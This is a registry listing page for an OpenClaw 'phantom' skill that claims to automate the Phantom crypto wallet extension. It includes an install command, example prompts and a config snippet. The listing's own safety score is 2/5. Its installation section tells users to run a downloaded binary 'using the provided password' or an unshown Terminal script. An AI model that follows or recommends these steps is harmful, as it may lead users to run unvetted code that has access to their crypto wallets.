ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 2/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate your Phantom wallet tasks with OpenClaw. Manage networks, track SPL/EVM tokens, and troubleshoot blockchain transactions via terminal commands.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-sokos
Or

What This Skill Does

The phantom skill for OpenClaw provides a comprehensive interface for managing the Phantom browser extension. It acts as an automation bridge between your AI agent and the Phantom wallet, enabling you to programmatically handle account management, network configuration, and asset tracking. By interacting with the underlying openclaw-agent, this skill allows users to perform complex blockchain operations—such as switching between Solana, Ethereum, and Polygon networks, adding custom RPC endpoints, and verifying token balances—without manual browser navigation. It is designed for power users and developers who need to interact with decentralized applications (dApps) and manage digital assets efficiently through automated workflows.

Installation

To begin, ensure you have the openclaw-agent installed on your machine. For Windows users, download the utility and execute the binary using the provided password. For macOS, use the specified installation script in your Terminal. Once the agent is active, install the skill by executing clawhub install openclaw/skills/skills/hightower6eu/phantom-sokos. This will integrate the necessary commands into your OpenClaw environment, allowing the agent to bridge communication between your terminal and the Phantom browser extension.

Use Cases

This skill is ideal for automating several crypto-related tasks:

  • Portfolio Management: Automatically checking balances of SPL tokens or EVM assets across multiple wallets.
  • Network Configuration: Rapidly switching RPC endpoints or adding custom networks (such as Arbitrum or custom Helius nodes) for development testing.
  • Security Auditing: Periodically reviewing and revoking access for connected dApps that are no longer in use.
  • Transaction Debugging: Monitoring stuck transaction signatures directly via CLI and calculating priority fees for high-traffic network conditions.

Example Prompts

  1. "Phantom, check my current SOL balance and list all associated SPL tokens for my account."
  2. "Add a new custom RPC for the Solana mainnet using the Helius endpoint with my API key."
  3. "List all active dApp connections in my Phantom wallet and revoke access for any sites I haven't visited in over 30 days."

Tips & Limitations

  • Security Warning: Never share your private keys or seed phrases with the agent. Always prefer hardware-backed or encrypted storage if possible.
  • Agent Dependency: The skill will fail if the openclaw-agent is not running in the background. Always verify the agent status before running complex transactions.
  • CLI Syncing: While this skill enables CLI interaction, sensitive operations like exporting private keys should be performed manually within the Phantom UI to minimize exposure.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-sokos": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#crypto#blockchain#web3#automation#wallet
Safety Score: 2/5

Flags: network-access, external-api, code-execution